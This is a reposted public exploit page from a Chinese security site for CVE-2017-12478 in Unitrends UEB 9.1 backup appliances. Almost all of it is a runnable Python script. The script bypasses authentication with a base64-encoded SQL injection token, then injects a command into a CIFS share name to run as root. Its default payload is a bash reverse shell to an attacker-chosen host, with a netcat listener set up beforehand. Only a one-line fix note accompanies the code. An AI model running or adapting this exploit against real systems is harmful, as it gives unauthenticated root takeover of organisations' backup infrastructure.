首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Unitrends UEB 9.1 Authentication Bypass / Remote Command Execution
来源:https://twitter.com/iotennui. 作者:Arave 发布时间:2017-10-10  
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Cale Smith, Benny Husted, Jared Arave
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12478
 
import httplib
import urllib
import ssl
import random
import sys
import base64
import string
from optparse import OptionParser
 
# Print some helpful words:
print """
###############################################################################
Unauthenticated root RCE for Unitrends UEB 9.1
Tested against appliance versions:
  [+] 9.1.0-2.201611302120.CentOS6
 
This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent root RCE. 
 
To use the exploit as written, make sure you're running a reverse
shell listener somewhere, using a command like:
 
$ nc -nlvp 1234
 
Then, just specify the ip and port of the remote listener in the 
exploit command. Alternatively, modify this exploit to contain a 
command of your choosing by modifying the 'cmd' variable below.
###############################################################################
"""
 
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
            ssl._create_default_https_context = ssl._create_unverified_context
 
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
        "       %prog -c 'touch /tmp/foooooooooooo'"
 
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
                  help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
                  help="Host listening for reverse shell connection")
parser.add_option("-p", '--LPORT', dest='lport', action="store",
                  help="Port on which nc is listening")
parser.add_option("-c", '--cmd', dest='cmd', action="store",
                  help="Run a custom command, no reverse shell for you.")
 
(options, args) = parser.parse_args()
 
if options.cmd:
    if (options.lhost or options.lport):
        parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")
 
    elif not options.rhost:
        parser.error("[!] No remote host specified.\n")
 
elif options.rhost is None or options.lhost is None or options.lport is None:
    parser.print_help()
    sys.exit(1)
 
RHOST = options.rhost
LHOST = options.lhost
LPORT = options.lport
if options.cmd:
    cmd = options.cmd
else:
    cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
 
url = '/api/storage/'
 
# Here, a SQLi string overrides the uuid, providing auth bypass.
# We'll need to base64 encode before sending... 
auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
 
params = urllib.urlencode({'auth' : auth})
 
params = """{{"type":4,"name":"aaaaaaaa","usage":"archive","properties":{{"username":"km","password":"km","port":"445","hostname":"asdf.com","protocol":"cifs","share_name":"`{0}`"}}}}""".format(cmd)
 
headers = {'Host' : RHOST,
           'Content-Type' : 'application/json',
           'X-Requested-With' : 'XMLHttpRequest',
           'AuthToken' : auth }
 
# Establish an HTTPS connection and send the payload.
conn = httplib.HTTPSConnection(RHOST, 443)
conn.set_debuglevel(1)
 
print """
[+] Sending payload to remote host [https://{0}]
[+] Here's some debug info:
""".format(RHOST)
 
conn.request("POST", url, params, headers=headers)
r1 = conn.getresponse()
 
print ""
print "[+] Request sent. Maybe your command was executed?"
print ""
 
# Print response, for debug purposes.
print r1.status, r1.reason
print r1.read()
 
# 3. Solution:
# Update to Unitrends UEB 10


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Unitrends UEB 9.1 Privilege Es
·Unitrends UEB 9.1 bpserverd Re
·ERS Data System 1.8.1 Java Des
·Apache Tomcat < 9.0.1 (Beta) /
·OrientDB 2.2.2 - 2.2.22 - Remo
·Rancher Server - Docker Daemon
·PyroBatchFTP 3.17 - Buffer Ove
·WebKit JSC - 'BytecodeGenerato
·ClipBucket 2.8.3 - Remote Code
·DiskBoss Enterprise 8.4.16 - L
·Dnsmasq < 2.78 - Integer Under
·Dnsmasq < 2.78 - Lack of free(
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved